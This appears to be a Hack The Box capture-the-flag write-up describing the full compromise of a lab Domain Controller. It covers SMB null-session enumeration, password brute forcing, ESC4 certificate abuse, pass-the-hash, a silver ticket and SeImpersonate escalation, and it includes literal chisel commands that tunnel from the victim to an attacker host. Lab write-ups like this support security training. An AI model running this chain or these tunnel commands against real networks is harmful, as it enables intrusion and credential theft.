Enumeration

Nmap

Initial nmap scan revealed HTTP and common Domain Controller ports open.

00 - nmap

SMB Null Session

Enumeration of SMB Shares with null session was allowed.

01 - smb null

One of the shares included incident.txt file. The file contained a text which explains some of the user accounts has weak passwords.

02 - incident

Brute Forcing

Because null session had READ access to the IPC$ share, I could brute force rid to create a user list.

04 - rid brute

Then with the generated user list, I applied empty password brute forcing.

06 - brute force empty

Two account’s status was PASSWORD MUST CHANGE, so I updated one of the user’s password using impacket’s smbpasswd.py

07 - update password smbpasswd py

SMB Enumeration

Later, with the new credentials I enumerated SMB shares again. This time I could access more shares.

08 - elliot shares

The config share included mssql service accounts password. However, MSSQL port was closed on the target.

09 - mssql

BloodHound

Later, I checked if I can access LDAP using sqlsvc account. After finding out I can, I ran bloodhound-python.

10 - bloodhound python

Checking the BloodHound revealed that Elliot.Yates (the user whom password was updated) can obtain the mgtsvc$ account which can winRM to the DC.

11 - mgmtsvc

So I applied necessary steps and got the winRM shell.

12 - mgmtsvc

13 - login

Privilege Escalation

1st Way

I ran the Invoke-PrivEscCheck.

14 - PrivescCheck

The output showed that one of the non-common processes running on the target had hardcoded credentials.

15 - cleartext clifford

And checking that user on the bloodhound revealed that the user was in the CA Operators group.

16 - CA Operators

So I ran certipy to check if there were any vulnerable templates.

17 - certipy

One of the templates was vulnerable to ESC4.

18 - vulnerable

So simply applied necessary steps to get the administrator hash.

19 - add ESC1 to template

20 - got the admin hash

Then using the hash, I applied pass the hash to get the root flag.

21 - got the root

2nd Way

The C:\ directory included SQL2019 directory, so I tried to run sqlcmd. But there were no useful databases and current_user was guest.

22 - 2nd way checkin sql user

However, I know the password of the sql service account. Thus, I can apply silver ticket attack to generate an Administrator ticket to access mssql service as dbadmin.

First I checked the SPN of the sqlsvc user.

23 - spn

Then generated NTLM hash from the cleartext password. And applied silver ticket attack using impacket-ticketer.

24 - silver ticket

Now there was a problem, I can’t login to the target service because it is internal. I need to apply portforwarding. So I used chisel and applied below steps:

  1. Update the /etc/proxychains4.conf 
     #socks4 127.0.0.1 9050
 socks5  127.0.0.1 1080
  2. Set Reverse Listener on attacker site: 
     chisel server --reverse --port 443
  3. Set client on the victim side: 
     chisel.exe client 10.10.16.11:443 R:socks
  4. Now we can access the internal network.

So I used impacket-mssqlclient with the generated ticket to get an intercative SQL shell. Then while listening with netcat, I ran a reverse shell using xp_cmdshell.

26 - mssqlclient

I got the shell as sqlsvc user. The user had SeImpersontaePrivileges.

27 - seimpersonate

I used SigmaPatato to abuse SeImpersonatePrivileges and got a system shell.

28 - sigma patato

29 - got the system

Pwned

The machine wass fully compromised.

PWNED

<
Previous Post
Sweep - Hack The Box
>
Next Post
Media - Hack The Box